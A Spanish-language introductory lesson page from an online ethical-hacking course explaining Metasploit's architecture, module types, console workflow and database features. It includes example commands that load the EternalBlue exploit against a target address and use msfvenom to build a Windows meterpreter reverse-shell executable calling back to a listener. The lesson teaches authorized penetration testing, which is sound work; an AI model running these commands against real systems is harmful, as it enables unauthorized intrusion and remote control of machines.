0Pricing
Ethical Hacking Academy · Lección

Arquitectura de Metasploit

Módulos y consola

Arquitectura de Metasploit es una lección gratuita de Ethical Hacking Academy en CoddyKit. Esta es la lección 1 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Ethical Hacking Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Ethical Hacking Academy incluye 4 lecciones en total.

¿Qué es Metasploit?

Metasploit es el framework de explotación más utilizado. Proporciona una biblioteca estructurada de exploits, payloads y herramientas para probar y demostrar vulnerabilidades durante trabajos autorizados.

En lugar de escribir cada ataque desde cero, cargue módulos probados, configúrelos y ejecútelos mediante una interfaz uniforme.

msfconsole

La interfaz principal es msfconsole, un shell interactivo de línea de comandos. Ofrece autocompletado con el tabulador, historial de comandos y acceso a todos los módulos.

Se inicia desde un terminal y, a continuación, se trabaja completamente dentro de su indicador.

msfconsole
# msf6 > help

Tipos de módulos

Metasploit organiza sus capacidades en tipos de módulos:

  • exploit: código que aprovecha una vulnerabilidad.
  • payload: código que se ejecuta en el objetivo después de la explotación.
  • auxiliary: escáneres, fuzzers y herramientas que no entregan un payload.
  • post: acciones posteriores a la explotación en un equipo comprometido.
  • encoder y nop: ayudan a los payloads a evadir la detección.

Nomenclatura de los módulos

Los módulos utilizan una ruta jerárquica que indica exactamente qué hacen. Leer la ruta revela el tipo, la plataforma y el servicio objetivo.

exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploit

Exploits frente a payloads

Una distinción importante:

  • El exploit es la vía de entrada; vulnera el software vulnerable.
  • El payload es lo que quiere que ocurra una vez dentro, como abrir un shell.

Se combinan: un exploit puede entregar muchos payloads distintos según su objetivo y el objetivo del ataque.

Flujo de trabajo de los módulos

El trabajo con cualquier módulo sigue un ciclo repetible:

  • search para buscar un módulo.
  • use para cargarlo.
  • establecer options como RHOSTS y LHOST.
  • run o exploit para ejecutarlo.

Esta uniformidad permite al framework escalar a miles de módulos.

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploit

Almacén de datos y opciones

La configuración de los módulos se encuentra en el datastore. Cada opción puede ser obligatoria u opcional.

  • RHOSTS: dirección o direcciones del objetivo remoto.
  • RPORT: puerto remoto.
  • LHOST: dirección de escucha para conexiones inversas.
  • LPORT: puerto de escucha.

Utilice show options para consultar qué necesita un módulo antes de ejecutarlo.

La base de datos

Metasploit se integra con una base de datos PostgreSQL para almacenar los hosts, servicios, información obtenida y credenciales descubiertos durante un trabajo. Esto permite gestionar eficazmente un alcance amplio.

Iníciela antes de abrir la consola para que los resultados se registren automáticamente.

msfdb init
# Inside msfconsole:
# db_status   hosts   services   creds

Módulos auxiliares

Los módulos auxiliary realizan tareas útiles sin explotar sistemas: escaneo de puertos, enumeración de servicios, ataques de fuerza bruta contra inicios de sesión y fuzzing.

A menudo son el primer paso, ya que recopilan la información necesaria antes de seleccionar un exploit.

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run

msfvenom

msfvenom es una herramienta complementaria para generar payloads independientes como archivos: ejecutables, scripts o shellcode que se entrega fuera de la consola.

Combina la generación y la codificación de payloads en un solo comando, lo que resulta útil para simulaciones de phishing o entregas personalizadas en pruebas autorizadas.

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe

Espacios de trabajo

Para trabajar con varios encargos, los workspaces de Metasploit mantienen aislados en la base de datos los hosts, servicios e información obtenida de cada cliente. Puede cambiar entre ellos para que los datos nunca se mezclen entre evaluaciones.

workspace -a clientA      # add a workspace
workspace clientA         # switch to it
workspace                 # list all

Comprobación rápida

Compruebe cuánto domina los tipos de módulos.

Repaso

Ha aprendido la arquitectura de Metasploit:

  • msfconsole es la interfaz principal; msfvenom crea payloads independientes.
  • Tipos de módulos: exploit, payload, auxiliary, post, encoder/nop.
  • Las rutas de los módulos codifican el tipo, la plataforma y el servicio.
  • Flujo de trabajo: search, use, set options, run; la configuración se encuentra en el datastore.
  • La base de datos PostgreSQL registra hosts, servicios e información obtenida.

Siguiente: buscar y utilizar exploits de forma eficaz.

Preguntas frecuentes

¿La lección «Arquitectura de Metasploit» es gratis?

Sí — el texto completo de «Arquitectura de Metasploit» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Ethical Hacking Academy, actualiza a CoddyKit PRO. El curso de Ethical Hacking Academy incluye 4 lecciones en total.

¿Qué aprenderé en «Arquitectura de Metasploit»?

Módulos y consola Practicas Ethical Hacking Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.

¿Necesito experiencia previa para empezar Ethical Hacking Academy?

No se requiere experiencia previa. Ethical Hacking Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 1 de 4.

¿Cuánto tiempo toma la lección «Arquitectura de Metasploit»?

La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.

¿Puedo escribir y ejecutar código en esta lección de Ethical Hacking Academy?

Sí. Cada lección de Ethical Hacking Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.

Todas las lecciones de este curso

  1. Arquitectura de Metasploit
  2. Búsqueda y uso de exploits
  3. Payloads y Meterpreter
  4. Módulos posteriores a la explotación
← Volver a Ethical Hacking Academy